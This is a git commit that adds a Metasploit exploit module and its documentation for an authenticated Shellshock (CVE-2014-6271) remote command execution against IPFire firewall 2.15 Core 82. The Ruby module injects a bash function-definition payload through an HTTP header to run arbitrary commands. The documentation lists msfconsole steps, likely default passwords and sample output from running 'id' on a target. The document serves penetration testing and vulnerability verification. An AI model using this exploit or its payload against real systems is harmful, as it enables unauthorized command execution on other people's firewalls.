first add of ipfire shellshock

bug/bundler_fix
h00die 2016-05-29 20:40:12 -04:00
parent 13adc3ee0a
commit df55f9a57c
2 changed files with 160 additions and 0 deletions

View File

@ -0,0 +1,47 @@
The following is the recommended format for module documentation.
But feel free to add more content/sections to this.
## Vulnerable Application
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
## Verification Steps
Example steps in this format:
1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
4. Do: ```set rhost 10.10.10.10```
5. Do: ```set CMD ls```
6. Do: ```run```
7. You should see the output of the command that was run.
## Options
**PASSWORD**
Password is set at install. May be blank, 'admin', or 'ipfire'.
**CMD**
This is the command to run on the system.
## Scenarios
Example of running the ID command
```
msf > use exploit/linux/http/ipfire_bashbug_exec
msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
rhost => 192.168.2.202
msf exploit(ipfire_bashbug_exec) > set CMD id
CMD => id
msf exploit(ipfire_bashbug_exec) > exploit
[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
[*] Exploit completed, but no session was created.
```

View File

@ -0,0 +1,113 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',
'Description' => %q{
IPFire, a free linux based open source firewall distribution,
version <= 2.15 Update Core 82 contains an authenticated remote
command execution vulnerability via shellshock in the request headers.
},
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # module
'Claudio Viviani' # discovery
],
'References' =>
[
[ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
[ 'CVE', 'CVE-2014-6271']
],
'License' => MSF_LICENSE,
'Platform' => %w{ linux unix },
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'PAYLOAD' => 'cmd/unix/generic'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 29 2014'
))
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
Opt::RPORT(444)
], self.class)
end
def check()
begin
res = send_request_cgi({
'uri' => '/cgi-bin/index.cgi',
'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
})
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
if version && update && version == "2.15" && update.to_i < 83
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
#
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; /bin/bash -c "#{cmd}" }
end
def exploit()
begin
payload = cve_2014_6271(datastore['CMD'])
vprint_status("Exploiting with payload: #{payload}" )
res = send_request_cgi({
'uri' => '/cgi-bin/index.cgi',
'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
'headers' => {'VULN' => payload}
})
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body
if output
print_good(output)
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end